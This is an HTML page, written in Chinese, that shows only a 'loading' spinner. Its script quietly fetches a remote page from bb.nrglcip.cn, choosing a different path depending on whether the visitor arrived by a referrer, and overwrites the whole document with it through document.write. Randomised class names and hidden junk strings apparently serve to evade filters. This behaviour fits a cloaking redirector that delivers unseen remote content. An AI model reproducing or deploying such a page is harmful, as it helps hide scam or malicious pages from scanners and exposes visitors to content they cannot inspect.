<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sbRwSRv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sbRwSRv .z7zdwf3McX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sbRwSRv .content {
            line-height: 50px;
            text-align: center
        }

        .sbRwSRv .img {
            width: 100%
        }

        .sbRwSRv .x5k7VR5 {
            text-align: center
        }

        .sbRwSRv .x5k7VR5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sbRwSRv .x5k7VR5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sbRwSRv .x5k7VR5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sbRwSRv .x5k7VR5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sbRwSRv .x5k7VR5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sbRwSRv .x5k7VR5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sbRwSRv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yTFbbPQ8Y26(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var mCz9Fyd = yTFbbPQ8Y26('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ mCz9Fyd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ mCz9Fyd +".html?a=share";
		}
		
        HpOH1WVM=url+"#"+new Date().getTime();
        HpOH1WVM && function() {
            $.get(HpOH1WVM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >gkgYtvPvdYWZTpDn6pbKffPD9KL6I2c5fQ6vtjDGntMfPc</ul>
<a  href='#' style='display:none'>aQHUlcqKzn46IfufrjvTleG2GL0mbCw0tB9C3UiIMNuxhqKnwta7JSjaq9MVF9b8juXoCKKRnH71cDde9Z5g2x</a>
<img  src='' style='display:none'>
<b style='display:none' >h6UuIsyX0LBsg3w3EPkvPg0sp2Pdg5rBn3dIPK053nAmHH9EjF7XcyF4Le</b><div class="sbRwSRv">
    <div class="z7zdwf3McX">
        <div class="x5k7VR5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >HztUOE0F47Xqgkti1FXWlGTnJlgEMmMpAgBcD</li>
<a  href='#' style='display:none'>U5GkHOZa08FaEpLKhm46AoYpjhzPn93zonF6WftraxLN6GvFIEmkPsmGLbqW9NYe7Q7OPBqTLW85</a>
<h1 style='display:none' >MKbFj4zggLgS60oE</h1></body>
</html>